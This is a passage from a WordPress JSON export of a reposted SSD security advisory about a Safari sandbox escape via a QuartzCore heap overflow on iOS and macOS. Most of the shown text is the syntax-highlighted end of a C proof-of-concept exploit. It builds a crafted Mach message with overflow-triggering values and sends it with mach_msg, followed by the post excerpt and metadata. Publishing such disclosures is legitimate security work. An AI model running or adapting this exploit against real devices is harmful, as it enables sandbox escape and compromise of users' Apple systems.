class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ Ports count<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-96\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/**<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-98\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\t1. 
One port consumes 12B space<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-99\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\t2. This `mach_msg` routine does not need a port, so set this port to MACH_PORT_NULL (memory<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-100\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\t&nbsp;&nbsp; cleared by memset)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-101\"><span class=\"crayon-c\">&nbsp;&nbsp;&nbsp;&nbsp; *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-102\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xdeadbeef<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn_id<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">int8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint64_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xdeadbeefdeadbeef<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-108\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x12<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ Decode Function<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/**(uint32_t*)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 15) = 0xDECAFBAD;*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-112\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint64_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x2000000000000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">31<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-116\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_SEND_MSG<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-118\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TIMEOUT_NONE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KERN_SUCCESS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;[-] Send message failed: %s\\n&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_error_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-123\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-125\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-126\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-127\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">do_int_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-130\"><span 
class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3796\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14-300x259.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Sun, 02 Dec 2018 13:08:59 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary QuartzCore ( https:\/\/developer.apple.com\/documentation\/quartzcore ), also known as CoreAnimation, is a framework use by macOS and iOS to build an animatable scene graph. CoreAnimation uses a unique rendering model where the graphics operations are run in a separate process. On macOS, the process is WindowServer and on iOS the name is backboardd. 
Both of &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3796\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 iOS\/macOS Safari Sandbox Escape via QuartzCore Heap Overflow<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12357,15244,10757],"class_list":["post-13976","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-heap-overflow","tag-sandbox-escape","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13976"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13976\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13976"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}